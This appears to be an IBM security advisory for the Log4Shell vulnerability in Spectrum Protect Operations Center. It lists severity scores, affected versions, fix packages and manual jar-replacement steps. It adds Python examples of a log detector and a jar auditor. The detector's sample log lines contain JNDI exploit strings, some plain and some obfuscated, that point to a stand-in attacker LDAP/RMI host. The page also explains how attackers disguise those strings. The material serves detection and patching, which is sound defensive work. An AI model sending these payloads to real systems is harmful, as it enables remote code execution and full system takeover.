10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.975 High
EPSS
Percentile
99.9%
A vulnerability in Apache Log4j could allow an attacker to execute arbitrary code on the system. This vulnerability may affect the Help system in IBM Spectrum Protect Operations Center.
CVEID: CVE-2021-44228
**DESCRIPTION:** Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by its JNDI features failing to protect against attacker-controlled LDAP and other JNDI-related endpoints. By sending a specially crafted string that the application logs, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam (not to be confused with the 2015 TLS "Logjam" weakness, which is unrelated).
CVSS Base score: 10
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/214921 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
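The crafted string the description refers to is a Log4j lookup of the form `${jndi:<scheme>://<host>/...}`, and attackers routinely hide the literal `jndi` behind the other lookups Log4j evaluates first (`${lower:j}`, `${::-n}`, `${env:X:-d}`) or URL-encode it. The detector below, an added example for this page and not IBM's or Apache's code, undoes those layers before matching. It assumes the attacker-controlled string reaches a text log unchanged (for example in an HTTP User-Agent or request path) and that any `${env:...:-x}` lookups name unset variables, so their default `x` is what Log4j would substitute; the log lines are constructed for the example.

```python
"""Flag log lines carrying a Log4j JNDI lookup string (CVE-2021-44228).

Added example for this page, not IBM's or Apache's code. The sample log
lines are constructed; the normalization mirrors what Log4j does to the
nested lookups before the JNDI lookup runs.
"""
import re
from urllib.parse import unquote

# Inner lookups Log4j resolves first; attackers nest them to hide "jndi".
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.I)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.I)
# ${env:NAME:-x} and ${::-x} evaluate to the default x when the key is unset
# (assumption: the named variables are unset). A ":-" inside a jndi lookup
# does NOT neutralise it (Log4j still resolves "jndi:ldap://h/a"), so those
# are deliberately left alone.
_DEFAULT = re.compile(r"\$\{(?!jndi:)[a-z]*:[^${}]*:-([^${}]*)\}", re.I)
# Log4j lower-cases the lookup prefix, so "JNDI" and "jNdI" both resolve.
_JNDI = re.compile(r"\$\{\s*jndi:([a-z]+):", re.I)


def normalize(line: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and the inner lookups, repeating until stable."""
    text = line
    for _ in range(max_rounds):
        new = unquote(text)                       # %24%7B -> ${, also double encoding
        new = _LOWER.sub(lambda m: m.group(1).lower(), new)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            return new
        text = new
    return text


def scan_lines(lines):
    """Return one hit per line whose normalized form contains a JNDI lookup."""
    hits = []
    for n, raw in enumerate(lines, 1):
        norm = normalize(raw)
        m = _JNDI.search(norm)
        if m:
            hits.append({"line": n, "scheme": m.group(1).lower(),
                         "normalized": norm, "raw": raw})
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:03:11 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:03:12 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:03:13 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:ldap://203.0.113.7:1389/b}"',
    '10.0.0.9 - - [10/Dec/2021:14:03:14 +0000] '
    '"GET /%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%2Fc%7D HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.3 - - [10/Dec/2021:14:03:15 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi via {hit['scheme']} -> {hit['normalized']}")
```

Lines 2, 3 and 4 of the sample are flagged (plain, obfuscated and URL-encoded forms); line 5 carries a harmless `${date:...}` lookup and is not. The normalization only covers the lookups listed above, so treat a miss as "no match", not as "clean".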
Affected Product(s) | Version(s)
---|---
IBM Spectrum Protect Operations Center | 8.1.0.000-8.1.13.000
IBM Spectrum Protect Operations Center | 7.1.0.000-7.1.14.000
IBM strongly recommends addressing this vulnerability now by upgrading to the fixed level instead of using the manual process described under Workarounds and Mitigations section.
Note: The fix packages below include Log4j 2.16.
IBM Spectrum Protect Operations Center Affected Versions | Fixing Level | Platform | Link to Fix and Instructions
---|---|---|---
8.1.0.000-8.1.13.000 | 8.1.13.100 | AIX, Linux, Windows | https://www.ibm.com/support/pages/node/6527288
7.1.0.000-7.1.14.000 | 7.1.14.100 | AIX, Linux, Windows | https://www.ibm.com/support/pages/node/6527284
Manual Procedure to Update the Help system
The Help system shipped with the Operations Center includes the affected Log4j jars. To update the Help system manually:
1. Download the Apache Log4j 2 binary (zip) apache-log4j-2.16.0-bin.zip from Apache:
https://logging.apache.org/log4j/2.0/download.html
2. Stop the Operations Center service (which also stops the Help system):
AIX - /opt/tivoli/tsm/ui/utils/stopserver.sh
Linux -
8.1.9 and lower (including v7) - service opscenter.rc stop
8.1.10 and higher - systemctl stop opscenter.service
Windows - From the Services window, stop the IBM Spectrum® Protect Operations Center service.
3. Unzip apache-log4j-2.16.0-bin.zip.
4. From the unzipped directory apache-log4j-2.16.0-bin, copy the Log4j 2.16.0 jars into the Help system library directory and remove the earlier ones. The library directory is:
AIX and Linux - /opt/tivoli/tsm/ui/Liberty/usr/servers/guiServer/apps/TSM_HELP.war/WEB-INF/lib/
Windows - C:\Program Files\Tivoli\TSM\ui\Liberty\usr\servers\guiServer\apps\TSM_HELP.war\WEB-INF\lib\
Replace:
log4j-api-2.8.2.jar
log4j-1.2-api-2.8.2.jar
log4j-core-2.8.2.jar
log4j-slf4j-impl-2.8.2.jar
with
log4j-api-2.16.0.jar
log4j-1.2-api-2.16.0.jar
log4j-core-2.16.0.jar
log4j-slf4j-impl-2.16.0.jar
5. Restart the Operations Center service:
AIX - /opt/tivoli/tsm/ui/utils/startserver.sh
Linux -
8.1.9 and lower (including v7) - service opscenter.rc start
8.1.10 and higher - systemctl start opscenter.service
Windows - From the Services window, start the IBM Spectrum® Protect Operations Center service.
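The jar swap in step 4 is where a manual patch goes wrong: a jar left behind, a mislabeled download, or a check that trusts file names. The script below, an added example for this page and not IBM's tooling, audits a WEB-INF/lib directory by reading the version each jar's manifest claims, refuses to touch anything until all four replacement jars are present and their manifests agree with their names, then moves the old jars to a backup directory and copies the new ones in. It assumes the jars are named log4j-<artifact>-<version>.jar as in the advisory and carry the usual Log4j manifest entry (Log4jReleaseVersion or Implementation-Version); the jars that make_sample_jar() builds for the demo are constructed stand-ins containing only a manifest, not real Log4j binaries. The 2.16.0 minimum is the level this advisory ships; later Log4j advisories recommend newer releases, so it is a parameter rather than a constant.

```python
"""Audit and swap the Log4j jars in a WEB-INF/lib directory.

Added example for this page, not IBM's tooling. Assumes log4j-<artifact>-<version>.jar
naming and a Log4j-style manifest; the sample jars built here are constructed
stand-ins with only a manifest, not real Log4j binaries.
"""
import re
import shutil
import tempfile
import zipfile
from pathlib import Path

# The four jars the advisory lists for the Help system.
ARTIFACTS = ("api", "1.2-api", "core", "slf4j-impl")
JAR_RE = re.compile(r"^log4j-(api|1\.2-api|core|slf4j-impl)-(\d+(?:\.\d+)+)\.jar$")


def parse_version(text: str) -> tuple:
    """'2.16.0' -> (2, 16, 0) so that 2.16 compares greater than 2.8."""
    return tuple(int(p) for p in text.split("."))


def jar_version(jar: Path):
    """Version the jar itself claims (manifest), falling back to the file name."""
    with zipfile.ZipFile(jar) as z:
        try:
            manifest = z.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        except KeyError:
            manifest = ""
    for key in ("Log4jReleaseVersion", "Implementation-Version"):
        m = re.search(rf"^{key}:\s*(\S+)", manifest, re.M)
        if m:
            return m.group(1)
    m = JAR_RE.match(jar.name)
    return m.group(2) if m else None


def audit(lib_dir, minimum: str = "2.16.0") -> dict:
    """Map each log4j jar in lib_dir to (version, meets_minimum)."""
    report = {}
    for jar in sorted(Path(lib_dir).glob("log4j-*.jar")):
        v = jar_version(jar)
        ok = v is not None and parse_version(v) >= parse_version(minimum)
        report[jar.name] = (v, ok)
    return report


def replace_jars(lib_dir, new_bin_dir, backup_dir, new_version: str = "2.16.0") -> list:
    """Move the old log4j jars to backup_dir and copy the new ones into lib_dir.

    All preconditions are checked before anything is touched, so a bad download
    leaves the Help system unpatched rather than half-patched. Keep backup_dir
    outside the web application directory.
    """
    lib, src, backup = Path(lib_dir), Path(new_bin_dir), Path(backup_dir)
    wanted = [src / f"log4j-{a}-{new_version}.jar" for a in ARTIFACTS]
    missing = [p.name for p in wanted if not p.is_file()]
    if missing:
        raise FileNotFoundError(f"not in {src}: {missing}")
    for p in wanted:  # a manifest that disagrees with the name is a mislabeled download
        v = jar_version(p)
        if v != new_version:
            raise ValueError(f"{p.name} manifest says {v!r}, expected {new_version}")
    backup.mkdir(parents=True, exist_ok=True)
    removed = []
    for old in list(lib.glob("log4j-*.jar")):
        if JAR_RE.match(old.name):
            shutil.move(str(old), str(backup / old.name))
            removed.append(old.name)
    for p in wanted:
        shutil.copy2(p, lib / p.name)
    return removed


def make_sample_jar(path: Path, version: str) -> None:
    """Constructed stand-in: a zip holding only a Log4j-style manifest."""
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("META-INF/MANIFEST.MF",
                   f"Manifest-Version: 1.0\r\nLog4jReleaseVersion: {version}\r\n\r\n")


def demo():
    """Stage a 2.8.2 lib directory and a 2.16.0 download in a temp tree, then patch it."""
    root = Path(tempfile.mkdtemp())
    lib = root / "TSM_HELP.war" / "WEB-INF" / "lib"   # layout mirrors the advisory's path
    src = root / "apache-log4j-2.16.0-bin"
    lib.mkdir(parents=True)
    src.mkdir()
    for a in ARTIFACTS:
        make_sample_jar(lib / f"log4j-{a}-2.8.2.jar", "2.8.2")
        make_sample_jar(src / f"log4j-{a}-2.16.0.jar", "2.16.0")
    before = audit(lib)
    removed = replace_jars(lib, src, root / "log4j-backup")
    after = audit(lib)
    shutil.rmtree(root)
    return before, removed, after


if __name__ == "__main__":
    before, removed, after = demo()
    print("before:", before)
    print("removed:", removed)
    print("after:", after)
```

Run `audit()` against the real directory after step 4 and before step 5: every entry must show `True`, and the backup directory must hold exactly the four 2.8.2 jars. Reading the manifest rather than trusting the file name is what catches a stale jar that was merely renamed.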
CPE
Name | Operator | Version
---|---|---
ibm spectrum protect extended edition | eq | 8.1
ibm spectrum protect extended edition | eq | 7.1